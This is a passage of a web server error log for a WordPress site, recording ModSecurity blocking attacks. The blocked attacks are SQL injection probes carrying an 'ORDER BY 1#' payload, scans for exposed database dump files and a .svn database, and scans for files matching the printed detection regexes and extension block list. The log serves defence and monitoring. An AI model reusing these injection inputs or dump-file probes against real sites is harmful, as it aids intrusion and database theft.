"OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK15A1VuGGNTxm_kiOFCgAAANA"] [Sat Aug 31 01:19:16.733602 2024] [:error] [pid 8672:tid 140590310156032] [client 193.29.13.20:38040] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47 ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK15A3r8UJC0kxJCKSq8gAAABU"] [Sat Aug 31 01:19:17.286799 2024] [:error] [pid 8676:tid 140590326941440] [client 193.29.13.20:38042] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK15Wm8LEssXUq6wJ2LTQAAAJM"] [Sat Aug 31 01:19:17.856548 2024] [:error] [pid 8676:tid 140590548489984] [client 193.29.13.20:38046] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK15Wm8LEssXUq6wJ2LTwAAAIE"] [Sat Aug 31 01:19:18.376600 2024] [:error] [pid 8676:tid 140590531704576] [client 193.29.13.20:38048] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK15mm8LEssXUq6wJ2LUAAAAIM"] [Sat Aug 31 01:19:18.877177 2024] [:error] [pid 9366:tid 140590548489984] [client 193.29.13.20:38050] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK15g1VuGGNTxm_kiOFCwAAAME"] [Sat Aug 31 01:19:19.405395 2024] [:error] [pid 9366:tid 140590301763328] [client 193.29.13.20:38052] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK15w1VuGGNTxm_kiOFDAAAANY"] [Sat Aug 31 01:19:19.771549 2024] [:error] [pid 9366:tid 140590444439296] [client 193.29.13.20:38054] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK15w1VuGGNTxm_kiOFDQAAAMU"] [Sat Aug 31 01:19:20.322416 2024] [:error] [pid 9366:tid 140590310156032] [client 193.29.13.20:38056] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK16A1VuGGNTxm_kiOFDgAAANU"] [Sat Aug 31 01:19:20.848273 2024] [:error] [pid 9366:tid 140590368904960] [client 193.29.13.20:38058] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK16A1VuGGNTxm_kiOFDwAAAM4"] [Sat Aug 31 01:19:21.319744 2024] [:error] [pid 8675:tid 140590556882688] [client 193.29.13.20:38060] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK16ZdLCjsWrLhZKAOZhwAAAEA"] [Sat Aug 31 01:19:21.767591 2024] [:error] [pid 8676:tid 140590419261184] [client 193.29.13.20:38062] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK16Wm8LEssXUq6wJ2LUQAAAIg"] [Sat Aug 31 03:04:03.522014 2024] [:error] [pid 8676:tid 140590310156032] [client 178.20.101.26:39226] [client 178.20.101.26] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/dump.sql"] [unique_id "ZtLOc2m8LEssXUq6wJ2LlgAAAJU"] [Sat Aug 31 03:04:03.912262 2024] [:error] [pid 9366:tid 140590410868480] [client 178.20.101.26:39228] [client 178.20.101.26] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/database.sql"] [unique_id "ZtLOcw1VuGGNTxm_kiOFlQAAAMk"] [Sat Aug 31 03:04:04.043994 2024] [:error] [pid 9366:tid 140590360512256] [client 46.20.146.41:39230] [client 46.20.146.41] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/dump.sql"] [unique_id "ZtLOdA1VuGGNTxm_kiOFlgAAAM8"] [Sat Aug 31 03:04:04.295417 2024] [:error] [pid 9366:tid 140590318548736] [client 178.20.101.26:39232] [client 178.20.101.26] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/db.sql"] [unique_id "ZtLOdA1VuGGNTxm_kiOFlwAAANQ"] [Sat Aug 31 03:04:04.670545 2024] [:error] [pid 8672:tid 140590402475776] [client 178.20.101.26:39234] [client 178.20.101.26] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/backup.sql"] [unique_id "ZtLOdA3r8UJC0kxJCKSrKgAAAAo"] [Sat Aug 31 03:04:04.673418 2024] [:error] [pid 9366:tid 140590436046592] [client 46.20.146.41:39236] [client 46.20.146.41] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/database.sql"] [unique_id "ZtLOdA1VuGGNTxm_kiOFmAAAAMY"] [Sat Aug 31 03:04:05.054479 2024] [:error] [pid 9366:tid 140590352119552] [client 178.20.101.26:39238] [client 178.20.101.26] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-options.sql"] [unique_id "ZtLOdQ1VuGGNTxm_kiOFmQAAANA"] [Sat Aug 31 03:04:05.285869 2024] [:error] [pid 8676:tid 140590343726848] [client 46.20.146.41:39240] [client 46.20.146.41] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/db.sql"] [unique_id "ZtLOdWm8LEssXUq6wJ2LlwAAAJE"] [Sat Aug 31 03:04:05.424948 2024] [:error] [pid 8676:tid 140590335334144] [client 178.20.101.26:39242] [client 178.20.101.26] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/options.sql"] [unique_id "ZtLOdWm8LEssXUq6wJ2LmAAAAJI"] [Sat Aug 31 03:04:05.891327 2024] [:error] [pid 8676:tid 140590444439296] [client 46.20.146.41:39246] [client 46.20.146.41] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/backup.sql"] [unique_id "ZtLOdWm8LEssXUq6wJ2LmQAAAIU"] [Sat Aug 31 03:04:06.499126 2024] [:error] [pid 8675:tid 140590343726848] [client 46.20.146.41:39248] [client 46.20.146.41] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-options.sql"] [unique_id "ZtLOdpdLCjsWrLhZKAOZqgAAAFE"] [Sat Aug 31 03:04:07.026029 2024] [:error] [pid 8675:tid 140590301763328] [client 46.20.146.41:39254] [client 46.20.146.41] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/options.sql"] [unique_id "ZtLOd5dLCjsWrLhZKAOZrAAAAFY"] [Sat Aug 31 03:21:40.571359 2024] [ssl:warn] [pid 31815:tid 140529787549568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Aug 31 03:21:40.855990 2024] [ssl:warn] [pid 31816:tid 140529787549568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Aug 31 03:21:41.413014 2024] [ssl:warn] [pid 31816:tid 140529787549568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Aug 31 03:21:43.985855 2024] [ssl:warn] [pid 31816:tid 140529787549568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Aug 31 03:21:46.377110 2024] [ssl:warn] [pid 32236:tid 140406828259200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Aug 31 03:21:46.677761 2024] [ssl:warn] [pid 32237:tid 140406828259200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Aug 31 08:37:42.830022 2024] [autoindex:error] [pid 416:tid 140406389905152] [client 64.227.165.147:42648] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Aug 31 19:03:38.002956 2024] [ssl:warn] [pid 32237:tid 140406828259200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 01 03:15:42.089570 2024] [ssl:warn] [pid 25212:tid 140182266013568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 01 03:15:42.361521 2024] [ssl:warn] [pid 25213:tid 140182266013568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 01 03:15:42.701300 2024] [ssl:warn] [pid 25213:tid 140182266013568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 01 03:15:44.947695 2024] [ssl:warn] [pid 25213:tid 140182266013568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 01 03:15:47.325131 2024] [ssl:warn] [pid 25628:tid 140340471625600] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 01 03:15:47.576756 2024] [ssl:warn] [pid 25629:tid 140340471625600] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/09/01 03:59:39 [error] 25512#25512: *89319 access forbidden by rule, client: 3.250.94.198, server: investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "investigacionperu.com" [Sun Sep 01 04:35:05.596690 2024] [autoindex:error] [pid 25651:tid 140340036024064] [client 4.213.113.19:34742] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex 